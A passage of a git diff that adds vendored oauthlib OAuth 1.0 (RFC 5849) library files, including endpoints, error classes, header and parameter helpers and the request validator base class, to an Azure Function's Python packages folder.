uri, http_method='GET', body=None, + headers=None, credentials=None): + """Create a request token response, with a new request token if valid. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :param credentials: A list of extra credentials to include in the token. + :returns: A tuple of 3 elements. + 1. A dict of headers to set on the response. + 2. The response body as a string. + 3. The response status code as an integer. + + An example of a valid request:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import RequestTokenEndpoint + >>> endpoint = RequestTokenEndpoint(your_validator) + >>> h, b, s = endpoint.create_request_token_response( + ... 'https://your.provider/request_token?foo=bar', + ... headers={ + ... 'Authorization': 'OAuth realm=movies user, oauth_....' + ... }, + ... credentials={ + ... 'my_specific': 'argument', + ... }) + >>> h + {'Content-Type': 'application/x-www-form-urlencoded'} + >>> b + 'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_callback_confirmed=true&my_specific=argument' + >>> s + 200 + + An response to invalid request would have a different body and status:: + + >>> b + 'error=invalid_request&description=missing+callback+uri' + >>> s + 400 + + The same goes for an an unauthorized request: + + >>> b + '' + >>> s + 401 + """ + resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'} + try: + request = self._create_request(uri, http_method, body, headers) + valid, processed_request = self.validate_request_token_request( + request) + if valid: + token = self.create_request_token(request, credentials or {}) + return resp_headers, token, 200 + else: + return {}, None, 401 + except errors.OAuth1Error as e: + return resp_headers, e.urlencoded, e.status_code + + def validate_request_token_request(self, request): + """Validate a request token request. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :raises: OAuth1Error if the request is invalid. + :returns: A tuple of 2 elements. + 1. The validation result (True or False). + 2. The request object. + """ + self._check_transport_security(request) + self._check_mandatory_parameters(request) + + if request.realm: + request.realms = request.realm.split(' ') + else: + request.realms = self.request_validator.get_default_realms( + request.client_key, request) + if not self.request_validator.check_realms(request.realms): + raise errors.InvalidRequestError( + description='Invalid realm {}. Allowed are {!r}.'.format( + request.realms, self.request_validator.realms)) + + if not request.redirect_uri: + raise errors.InvalidRequestError( + description='Missing callback URI.') + + if not self.request_validator.validate_timestamp_and_nonce( + request.client_key, request.timestamp, request.nonce, request, + request_token=request.resource_owner_key): + return False, request + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid client credentials. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy client is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable client enumeration + valid_client = self.request_validator.validate_client_key( + request.client_key, request) + if not valid_client: + request.client_key = self.request_validator.dummy_client + + # Note that `realm`_ is only used in authorization headers and how + # it should be interepreted is not included in the OAuth spec. + # However they could be seen as a scope or realm to which the + # client has access and as such every client should be checked + # to ensure it is authorized access to that scope or realm. + # .. _`realm`: https://tools.ietf.org/html/rfc2617#section-1.2 + # + # Note that early exit would enable client realm access enumeration. + # + # The require_realm indicates this is the first step in the OAuth + # workflow where a client requests access to a specific realm. + # This first step (obtaining request token) need not require a realm + # and can then be identified by checking the require_resource_owner + # flag and abscence of realm. + # + # Clients obtaining an access token will not supply a realm and it will + # not be checked. Instead the previously requested realm should be + # transferred from the request token to the access token. + # + # Access to protected resources will always validate the realm but note + # that the realm is now tied to the access token and not provided by + # the client. + valid_realm = self.request_validator.validate_requested_realms( + request.client_key, request.realms, request) + + # Callback is normally never required, except for requests for + # a Temporary Credential as described in `Section 2.1`_ + # .._`Section 2.1`: https://tools.ietf.org/html/rfc5849#section-2.1 + valid_redirect = self.request_validator.validate_redirect_uri( + request.client_key, request.redirect_uri, request) + if not request.redirect_uri: + raise NotImplementedError('Redirect URI must either be provided ' + 'or set to a default during validation.') + + valid_signature = self._check_signature(request) + + # log the results to the validator_log + # this lets us handle internal reporting and analysis + request.validator_log['client'] = valid_client + request.validator_log['realm'] = valid_realm + request.validator_log['callback'] = valid_redirect + request.validator_log['signature'] = valid_signature + + # We delay checking validity until the very end, using dummy values for + # calculations and fetching secrets/keys to ensure the flow of every + # request remains almost identical regardless of whether valid values + # have been supplied. This ensures near constant time execution and + # prevents malicious users from guessing sensitive information + v = all((valid_client, valid_realm, valid_redirect, valid_signature)) + if not v: + log.info("[Failure] request verification failed.") + log.info("Valid client: %s.", valid_client) + log.info("Valid realm: %s.", valid_realm) + log.info("Valid callback: %s.", valid_redirect) + log.info("Valid signature: %s.", valid_signature) + return v, request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py new file mode 100644 index 0000000..86f44ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py @@ -0,0 +1,163 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.resource +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the resource protection provider logic of +OAuth 1.0 RFC 5849. +""" +import logging + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class ResourceEndpoint(BaseEndpoint): + + """An endpoint responsible for protecting resources. + + Typical use is to instantiate with a request validator and invoke the + ``validate_protected_resource_request`` in a decorator around a view + function. If the request is valid, invoke and return the response of the + view. If invalid create and return an error response directly from the + decorator. + + See :doc:`/oauth1/validator` for details on which validator methods to implement + for this endpoint. + + An example decorator:: + + from functools import wraps + from your_validator import your_validator + from oauthlib.oauth1 import ResourceEndpoint + endpoint = ResourceEndpoint(your_validator) + + def require_oauth(realms=None): + def decorator(f): + @wraps(f) + def wrapper(request, *args, **kwargs): + v, r = provider.validate_protected_resource_request( + request.url, + http_method=request.method, + body=request.data, + headers=request.headers, + realms=realms or []) + if v: + return f(*args, **kwargs) + else: + return abort(403) + """ + + def validate_protected_resource_request(self, uri, http_method='GET', + body=None, headers=None, realms=None): + """Create a request token response, with a new request token if valid. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :param realms: A list of realms the resource is protected under. + This will be supplied to the ``validate_realms`` + method of the request validator. + :returns: A tuple of 2 elements. + 1. True if valid, False otherwise. + 2. An oauthlib.common.Request object. + """ + try: + request = self._create_request(uri, http_method, body, headers) + except errors.OAuth1Error: + return False, None + + try: + self._check_transport_security(request) + self._check_mandatory_parameters(request) + except errors.OAuth1Error: + return False, request + + if not request.resource_owner_key: + return False, request + + if not self.request_validator.check_access_token( + request.resource_owner_key): + return False, request + + if not self.request_validator.validate_timestamp_and_nonce( + request.client_key, request.timestamp, request.nonce, request, + access_token=request.resource_owner_key): + return False, request + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid client credentials. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy client is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable client enumeration + valid_client = self.request_validator.validate_client_key( + request.client_key, request) + if not valid_client: + request.client_key = self.request_validator.dummy_client + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid or expired token. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy token is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable resource owner enumeration + valid_resource_owner = self.request_validator.validate_access_token( + request.client_key, request.resource_owner_key, request) + if not valid_resource_owner: + request.resource_owner_key = self.request_validator.dummy_access_token + + # Note that `realm`_ is only used in authorization headers and how + # it should be interepreted is not included in the OAuth spec. + # However they could be seen as a scope or realm to which the + # client has access and as such every client should be checked + # to ensure it is authorized access to that scope or realm. + # .. _`realm`: https://tools.ietf.org/html/rfc2617#section-1.2 + # + # Note that early exit would enable client realm access enumeration. + # + # The require_realm indicates this is the first step in the OAuth + # workflow where a client requests access to a specific realm. + # This first step (obtaining request token) need not require a realm + # and can then be identified by checking the require_resource_owner + # flag and abscence of realm. + # + # Clients obtaining an access token will not supply a realm and it will + # not be checked. Instead the previously requested realm should be + # transferred from the request token to the access token. + # + # Access to protected resources will always validate the realm but note + # that the realm is now tied to the access token and not provided by + # the client. + valid_realm = self.request_validator.validate_realms(request.client_key, + request.resource_owner_key, request, uri=request.uri, + realms=realms) + + valid_signature = self._check_signature(request) + + # log the results to the validator_log + # this lets us handle internal reporting and analysis + request.validator_log['client'] = valid_client + request.validator_log['resource_owner'] = valid_resource_owner + request.validator_log['realm'] = valid_realm + request.validator_log['signature'] = valid_signature + + # We delay checking validity until the very end, using dummy values for + # calculations and fetching secrets/keys to ensure the flow of every + # request remains almost identical regardless of whether valid values + # have been supplied. This ensures near constant time execution and + # prevents malicious users from guessing sensitive information + v = all((valid_client, valid_resource_owner, valid_realm, + valid_signature)) + if not v: + log.info("[Failure] request verification failed.") + log.info("Valid client: %s", valid_client) + log.info("Valid token: %s", valid_resource_owner) + log.info("Valid realm: %s", valid_realm) + log.info("Valid signature: %s", valid_signature) + return v, request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py new file mode 100644 index 0000000..0c15d16 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py @@ -0,0 +1,82 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.signature_only +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the signing logic of OAuth 1.0 RFC 5849. +""" + +import logging + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class SignatureOnlyEndpoint(BaseEndpoint): + + """An endpoint only responsible for verifying an oauth signature.""" + + def validate_request(self, uri, http_method='GET', + body=None, headers=None): + """Validate a signed OAuth request. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :returns: A tuple of 2 elements. + 1. True if valid, False otherwise. + 2. An oauthlib.common.Request object. + """ + try: + request = self._create_request(uri, http_method, body, headers) + except errors.OAuth1Error as err: + log.info( + 'Exception caught while validating request, %s.' % err) + return False, None + + try: + self._check_transport_security(request) + self._check_mandatory_parameters(request) + except errors.OAuth1Error as err: + log.info( + 'Exception caught while validating request, %s.' % err) + return False, request + + if not self.request_validator.validate_timestamp_and_nonce( + request.client_key, request.timestamp, request.nonce, request): + log.debug('[Failure] verification failed: timestamp/nonce') + return False, request + + # The server SHOULD return a 401 (Unauthorized) status code when + # receiving a request with invalid client credentials. + # Note: This is postponed in order to avoid timing attacks, instead + # a dummy client is assigned and used to maintain near constant + # time request verification. + # + # Note that early exit would enable client enumeration + valid_client = self.request_validator.validate_client_key( + request.client_key, request) + if not valid_client: + request.client_key = self.request_validator.dummy_client + + valid_signature = self._check_signature(request) + + # log the results to the validator_log + # this lets us handle internal reporting and analysis + request.validator_log['client'] = valid_client + request.validator_log['signature'] = valid_signature + + # We delay checking validity until the very end, using dummy values for + # calculations and fetching secrets/keys to ensure the flow of every + # request remains almost identical regardless of whether valid values + # have been supplied. This ensures near constant time execution and + # prevents malicious users from guessing sensitive information + v = all((valid_client, valid_signature)) + if not v: + log.info("[Failure] request verification failed.") + log.info("Valid client: %s", valid_client) + log.info("Valid signature: %s", valid_signature) + return v, request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py new file mode 100644 index 0000000..3bc6cb3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py @@ -0,0 +1,76 @@ +""" +oauthlib.oauth1.rfc5849.errors +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Error used both by OAuth 1 clients and provicers to represent the spec +defined error responses for all four core grant types. +""" +from oauthlib.common import add_params_to_uri, urlencode + + +class OAuth1Error(Exception): + error = None + description = '' + + def __init__(self, description=None, uri=None, status_code=400, + request=None): + """ + description: A human-readable ASCII [USASCII] text providing + additional information, used to assist the client + developer in understanding the error that occurred. + Values for the "error_description" parameter MUST NOT + include characters outside the set + x20-21 / x23-5B / x5D-7E. + + uri: A URI identifying a human-readable web page with information + about the error, used to provide the client developer with + additional information about the error. Values for the + "error_uri" parameter MUST conform to the URI- Reference + syntax, and thus MUST NOT include characters outside the set + x21 / x23-5B / x5D-7E. + + state: A CSRF protection value received from the client. + + request: Oauthlib Request object + """ + self.description = description or self.description + message = '({}) {}'.format(self.error, self.description) + if request: + message += ' ' + repr(request) + super().__init__(message) + + self.uri = uri + self.status_code = status_code + + def in_uri(self, uri): + return add_params_to_uri(uri, self.twotuples) + + @property + def twotuples(self): + error = [('error', self.error)] + if self.description: + error.append(('error_description', self.description)) + if self.uri: + error.append(('error_uri', self.uri)) + return error + + @property + def urlencoded(self): + return urlencode(self.twotuples) + + +class InsecureTransportError(OAuth1Error): + error = 'insecure_transport_protocol' + description = 'Only HTTPS connections are permitted.' + + +class InvalidSignatureMethodError(OAuth1Error): + error = 'invalid_signature_method' + + +class InvalidRequestError(OAuth1Error): + error = 'invalid_request' + + +class InvalidClientError(OAuth1Error): + error = 'invalid_client' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py new file mode 100644 index 0000000..4c3e98f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/parameters.py @@ -0,0 +1,133 @@ +""" +oauthlib.parameters +~~~~~~~~~~~~~~~~~~~ + +This module contains methods related to `section 3.5`_ of the OAuth 1.0a spec. + +.. _`section 3.5`: https://tools.ietf.org/html/rfc5849#section-3.5 +""" +from urllib.parse import urlparse, urlunparse + +from oauthlib.common import extract_params, urlencode + +from . import utils + + +# TODO: do we need filter_params now that oauth_params are handled by Request? +# We can easily pass in just oauth protocol params. +@utils.filter_params +def prepare_headers(oauth_params, headers=None, realm=None): + """**Prepare the Authorization header.** + Per `section 3.5.1`_ of the spec. + + Protocol parameters can be transmitted using the HTTP "Authorization" + header field as defined by `RFC2617`_ with the auth-scheme name set to + "OAuth" (case insensitive). + + For example:: + + Authorization: OAuth realm="Example", + oauth_consumer_key="0685bd9184jfhq22", + oauth_token="ad180jjd733klru7", + oauth_signature_method="HMAC-SHA1", + oauth_signature="wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D", + oauth_timestamp="137131200", + oauth_nonce="4572616e48616d6d65724c61686176", + oauth_version="1.0" + + + .. _`section 3.5.1`: https://tools.ietf.org/html/rfc5849#section-3.5.1 + .. _`RFC2617`: https://tools.ietf.org/html/rfc2617 + """ + headers = headers or {} + + # Protocol parameters SHALL be included in the "Authorization" header + # field as follows: + authorization_header_parameters_parts = [] + for oauth_parameter_name, value in oauth_params: + # 1. Parameter names and values are encoded per Parameter Encoding + # (`Section 3.6`_) + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + escaped_name = utils.escape(oauth_parameter_name) + escaped_value = utils.escape(value) + + # 2. Each parameter's name is immediately followed by an "=" character + # (ASCII code 61), a """ character (ASCII code 34), the parameter + # value (MAY be empty), and another """ character (ASCII code 34). + part = '{}="{}"'.format(escaped_name, escaped_value) + + authorization_header_parameters_parts.append(part) + + # 3. Parameters are separated by a "," character (ASCII code 44) and + # OPTIONAL linear whitespace per `RFC2617`_. + # + # .. _`RFC2617`: https://tools.ietf.org/html/rfc2617 + authorization_header_parameters = ', '.join( + authorization_header_parameters_parts) + + # 4. The OPTIONAL "realm" parameter MAY be added and interpreted per + # `RFC2617 section 1.2`_. + # + # .. _`RFC2617 section 1.2`: https://tools.ietf.org/html/rfc2617#section-1.2 + if realm: + # NOTE: realm should *not* be escaped + authorization_header_parameters = ('realm="%s", ' % realm + + authorization_header_parameters) + + # the auth-scheme name set to "OAuth" (case insensitive). + authorization_header = 'OAuth %s' % authorization_header_parameters + + # contribute the Authorization header to the given headers + full_headers = {} + full_headers.update(headers) + full_headers['Authorization'] = authorization_header + return full_headers + + +def _append_params(oauth_params, params): + """Append OAuth params to an existing set of parameters. + + Both params and oauth_params is must be lists of 2-tuples. + + Per `section 3.5.2`_ and `3.5.3`_ of the spec. + + .. _`section 3.5.2`: https://tools.ietf.org/html/rfc5849#section-3.5.2 + .. _`3.5.3`: https://tools.ietf.org/html/rfc5849#section-3.5.3 + + """ + merged = list(params) + merged.extend(oauth_params) + # The request URI / entity-body MAY include other request-specific + # parameters, in which case, the protocol parameters SHOULD be appended + # following the request-specific parameters, properly separated by an "&" + # character (ASCII code 38) + merged.sort(key=lambda i: i[0].startswith('oauth_')) + return merged + + +def prepare_form_encoded_body(oauth_params, body): + """Prepare the Form-Encoded Body. + + Per `section 3.5.2`_ of the spec. + + .. _`section 3.5.2`: https://tools.ietf.org/html/rfc5849#section-3.5.2 + + """ + # append OAuth params to the existing body + return _append_params(oauth_params, body) + + +def prepare_request_uri_query(oauth_params, uri): + """Prepare the Request URI Query. + + Per `section 3.5.3`_ of the spec. + + .. _`section 3.5.3`: https://tools.ietf.org/html/rfc5849#section-3.5.3 + + """ + # append OAuth params to the existing set of query components + sch, net, path, par, query, fra = urlparse(uri) + query = urlencode( + _append_params(oauth_params, extract_params(query) or [])) + return urlunparse((sch, net, path, par, query, fra)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py new file mode 100644 index 0000000..2c24c8c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/request_validator.py @@ -0,0 +1,849 @@ +""" +oauthlib.oauth1.rfc5849 +~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for signing and checking OAuth 1.0 RFC 5849 requests. +""" +from . import SIGNATURE_METHODS, utils + + +class RequestValidator: + + """A validator/datastore interaction base class for OAuth 1 providers. + + OAuth providers should inherit from RequestValidator and implement the + methods and properties outlined below. Further details are provided in the + documentation for each method and property. + + Methods used to check the format of input parameters. Common tests include + length, character set, membership, range or pattern. These tests are + referred to as `whitelisting or blacklisting`_. Whitelisting is better + but blacklisting can be usefull to spot malicious activity. + The following have methods a default implementation: + + - check_client_key + - check_request_token + - check_access_token + - check_nonce + - check_verifier + - check_realms + + The methods above default to whitelist input parameters, checking that they + are alphanumerical and between a minimum and maximum length. Rather than + overloading the methods a few properties can be used to configure these + methods. + + * @safe_characters -> (character set) + * @client_key_length -> (min, max) + * @request_token_length -> (min, max) + * @access_token_length -> (min, max) + * @nonce_length -> (min, max) + * @verifier_length -> (min, max) + * @realms -> [list, of, realms] + + Methods used to validate/invalidate input parameters. These checks usually + hit either persistent or temporary storage such as databases or the + filesystem. See each methods documentation for detailed usage. + The following methods must be implemented: + + - validate_client_key + - validate_request_token + - validate_access_token + - validate_timestamp_and_nonce + - validate_redirect_uri + - validate_requested_realms + - validate_realms + - validate_verifier + - invalidate_request_token + + Methods used to retrieve sensitive information from storage. + The following methods must be implemented: + + - get_client_secret + - get_request_token_secret + - get_access_token_secret + - get_rsa_key + - get_realms + - get_default_realms + - get_redirect_uri + + Methods used to save credentials. + The following methods must be implemented: + + - save_request_token + - save_verifier + - save_access_token + + Methods used to verify input parameters. This methods are used during + authorizing request token by user (AuthorizationEndpoint), to check if + parameters are valid. During token authorization request is not signed, + thus 'validation' methods can not be used. The following methods must be + implemented: + + - verify_realms + - verify_request_token + + To prevent timing attacks it is necessary to not exit early even if the + client key or resource owner key is invalid. Instead dummy values should + be used during the remaining verification process. It is very important + that the dummy client and token are valid input parameters to the methods + get_client_secret, get_rsa_key and get_(access/request)_token_secret and + that the running time of those methods when given a dummy value remain + equivalent to the running time when given a valid client/resource owner. + The following properties must be implemented: + + * @dummy_client + * @dummy_request_token + * @dummy_access_token + + Example implementations have been provided, note that the database used is + a simple dictionary and serves only an illustrative purpose. Use whichever + database suits your project and how to access it is entirely up to you. + The methods are introduced in an order which should make understanding + their use more straightforward and as such it could be worth reading what + follows in chronological order. + + .. _`whitelisting or blacklisting`: https://www.schneier.com/blog/archives/2011/01/whitelisting_vs.html + """ + + def __init__(self): + pass + + @property + def allowed_signature_methods(self): + return SIGNATURE_METHODS + + @property + def safe_characters(self): + return set(utils.UNICODE_ASCII_CHARACTER_SET) + + @property + def client_key_length(self): + return 20, 30 + + @property + def request_token_length(self): + return 20, 30 + + @property + def access_token_length(self): + return 20, 30 + + @property + def timestamp_lifetime(self): + return 600 + + @property + def nonce_length(self): + return 20, 30 + + @property + def verifier_length(self): + return 20, 30 + + @property + def realms(self): + return [] + + @property + def enforce_ssl(self): + return True + + def check_client_key(self, client_key): + """Check that the client key only contains safe characters + and is no shorter than lower and no longer than upper. + """ + lower, upper = self.client_key_length + return (set(client_key) <= self.safe_characters and + lower <= len(client_key) <= upper) + + def check_request_token(self, request_token): + """Checks that the request token contains only safe characters + and is no shorter than lower and no longer than upper. + """ + lower, upper = self.request_token_length + return (set(request_token) <= self.safe_characters and + lower <= len(request_token) <= upper) + + def check_access_token(self, request_token): + """Checks that the token contains only safe characters + and is no shorter than lower and no longer than upper. + """ + lower, upper = self.access_token_length + return (set(request_token) <= self.safe_characters and + lower <= len(request_token) <= upper) + + def check_nonce(self, nonce): + """Checks that the nonce only contains only safe characters + and is no shorter than lower and no longer than upper. + """ + lower, upper = self.nonce_length + return (set(nonce) <= self.safe_characters and + lower <= len(nonce) <= upper) + + def check_verifier(self, verifier): + """Checks that the verifier contains only safe characters + and is no shorter than lower and no longer than upper. + """ + lower, upper = self.verifier_length + return (set(verifier) <= self.safe_characters and + lower <= len(verifier) <= upper) + + def check_realms(self, realms): + """Check that the realm is one of a set allowed realms.""" + return all(r in self.realms for r in realms) + + def _subclass_must_implement(self, fn): + """ + Returns a NotImplementedError for a function that should be implemented. + :param fn: name of the function + """ + m = "Missing function implementation in {}: {}".format(type(self), fn) + return NotImplementedError(m) + + @property + def dummy_client(self): + """Dummy client used when an invalid client key is supplied. + + :returns: The dummy client key string. + + The dummy client should be associated with either a client secret, + a rsa key or both depending on which signature methods are supported. + Providers should make sure that + + get_client_secret(dummy_client) + get_rsa_key(dummy_client) + + return a valid secret or key for the dummy client. + + This method is used by + + * AccessTokenEndpoint + * RequestTokenEndpoint + * ResourceEndpoint + * SignatureOnlyEndpoint + """ + raise self._subclass_must_implement("dummy_client") + + @property + def dummy_request_token(self): + """Dummy request token used when an invalid token was supplied. + + :returns: The dummy request token string. + + The dummy request token should be associated with a request token + secret such that get_request_token_secret(.., dummy_request_token) + returns a valid secret. + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("dummy_request_token") + + @property + def dummy_access_token(self): + """Dummy access token used when an invalid token was supplied. + + :returns: The dummy access token string. + + The dummy access token should be associated with an access token + secret such that get_access_token_secret(.., dummy_access_token) + returns a valid secret. + + This method is used by + + * ResourceEndpoint + """ + raise self._subclass_must_implement("dummy_access_token") + + def get_client_secret(self, client_key, request): + """Retrieves the client secret associated with the client key. + + :param client_key: The client/consumer key. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The client secret as a string. + + This method must allow the use of a dummy client_key value. + Fetching the secret using the dummy key must take the same amount of + time as fetching a secret for a valid client:: + + # Unlikely to be near constant time as it uses two database + # lookups for a valid client, and only one for an invalid. + from your_datastore import ClientSecret + if ClientSecret.has(client_key): + return ClientSecret.get(client_key) + else: + return 'dummy' + + # Aim to mimic number of latency inducing operations no matter + # whether the client is valid or not. + from your_datastore import ClientSecret + return ClientSecret.get(client_key, 'dummy') + + Note that the returned key must be in plaintext. + + This method is used by + + * AccessTokenEndpoint + * RequestTokenEndpoint + * ResourceEndpoint + * SignatureOnlyEndpoint + """ + raise self._subclass_must_implement('get_client_secret') + + def get_request_token_secret(self, client_key, token, request): + """Retrieves the shared secret associated with the request token. + + :param client_key: The client/consumer key. + :param token: The request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The token secret as a string. + + This method must allow the use of a dummy values and the running time + must be roughly equivalent to that of the running time of valid values:: + + # Unlikely to be near constant time as it uses two database + # lookups for a valid client, and only one for an invalid. + from your_datastore import RequestTokenSecret + if RequestTokenSecret.has(client_key): + return RequestTokenSecret.get((client_key, request_token)) + else: + return 'dummy' + + # Aim to mimic number of latency inducing operations no matter + # whether the client is valid or not. + from your_datastore import RequestTokenSecret + return ClientSecret.get((client_key, request_token), 'dummy') + + Note that the returned key must be in plaintext. + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement('get_request_token_secret') + + def get_access_token_secret(self, client_key, token, request): + """Retrieves the shared secret associated with the access token. + + :param client_key: The client/consumer key. + :param token: The access token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The token secret as a string. + + This method must allow the use of a dummy values and the running time + must be roughly equivalent to that of the running time of valid values:: + + # Unlikely to be near constant time as it uses two database + # lookups for a valid client, and only one for an invalid. + from your_datastore import AccessTokenSecret + if AccessTokenSecret.has(client_key): + return AccessTokenSecret.get((client_key, request_token)) + else: + return 'dummy' + + # Aim to mimic number of latency inducing operations no matter + # whether the client is valid or not. + from your_datastore import AccessTokenSecret + return ClientSecret.get((client_key, request_token), 'dummy') + + Note that the returned key must be in plaintext. + + This method is used by + + * ResourceEndpoint + """ + raise self._subclass_must_implement("get_access_token_secret") + + def get_default_realms(self, client_key, request): + """Get the default realms for a client. + + :param client_key: The client/consumer key. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The list of default realms associated with the client. + + The list of default realms will be set during client registration and + is outside the scope of OAuthLib. + + This method is used by + + * RequestTokenEndpoint + """ + raise self._subclass_must_implement("get_default_realms") + + def get_realms(self, token, request): + """Get realms associated with a request token. + + :param token: The request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The list of realms associated with the request token. + + This method is used by + + * AuthorizationEndpoint + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("get_realms") + + def get_redirect_uri(self, token, request): + """Get the redirect URI associated with a request token. + + :param token: The request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The redirect URI associated with the request token. + + It may be desirable to return a custom URI if the redirect is set to "oob". + In this case, the user will be redirected to the returned URI and at that + endpoint the verifier can be displayed. + + This method is used by + + * AuthorizationEndpoint + """ + raise self._subclass_must_implement("get_redirect_uri") + + def get_rsa_key(self, client_key, request): + """Retrieves a previously stored client provided RSA key. + + :param client_key: The client/consumer key. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: The rsa public key as a string. + + This method must allow the use of a dummy client_key value. Fetching + the rsa key using the dummy key must take the same amount of time + as fetching a key for a valid client. The dummy key must also be of + the same bit length as client keys. + + Note that the key must be returned in plaintext. + + This method is used by + + * AccessTokenEndpoint + * RequestTokenEndpoint + * ResourceEndpoint + * SignatureOnlyEndpoint + """ + raise self._subclass_must_implement("get_rsa_key") + + def invalidate_request_token(self, client_key, request_token, request): + """Invalidates a used request token. + + :param client_key: The client/consumer key. + :param request_token: The request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: None + + Per `Section 2.3`__ of the spec: + + "The server MUST (...) ensure that the temporary + credentials have not expired or been used before." + + .. _`Section 2.3`: https://tools.ietf.org/html/rfc5849#section-2.3 + + This method should ensure that provided token won't validate anymore. + It can be simply removing RequestToken from storage or setting + specific flag that makes it invalid (note that such flag should be + also validated during request token validation). + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("invalidate_request_token") + + def validate_client_key(self, client_key, request): + """Validates that supplied client key is a registered and valid client. + + :param client_key: The client/consumer key. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + Note that if the dummy client is supplied it should validate in same + or nearly the same amount of time as a valid one. + + Ensure latency inducing tasks are mimiced even for dummy clients. + For example, use:: + + from your_datastore import Client + try: + return Client.exists(client_key, access_token) + except DoesNotExist: + return False + + Rather than:: + + from your_datastore import Client + if access_token == self.dummy_access_token: + return False + else: + return Client.exists(client_key, access_token) + + This method is used by + + * AccessTokenEndpoint + * RequestTokenEndpoint + * ResourceEndpoint + * SignatureOnlyEndpoint + """ + raise self._subclass_must_implement("validate_client_key") + + def validate_request_token(self, client_key, token, request): + """Validates that supplied request token is registered and valid. + + :param client_key: The client/consumer key. + :param token: The request token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + Note that if the dummy request_token is supplied it should validate in + the same nearly the same amount of time as a valid one. + + Ensure latency inducing tasks are mimiced even for dummy clients. + For example, use:: + + from your_datastore import RequestToken + try: + return RequestToken.exists(client_key, access_token) + except DoesNotExist: + return False + + Rather than:: + + from your_datastore import RequestToken + if access_token == self.dummy_access_token: + return False + else: + return RequestToken.exists(client_key, access_token) + + This method is used by + + * AccessTokenEndpoint + """ + raise self._subclass_must_implement("validate_request_token") + + def validate_access_token(self, client_key, token, request): + """Validates that supplied access token is registered and valid. + + :param client_key: The client/consumer key. + :param token: The access token string. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :returns: True or False + + Note that if the dummy access token is supplied it should validate in + the same or nearly the same amount of time as a valid one. + + 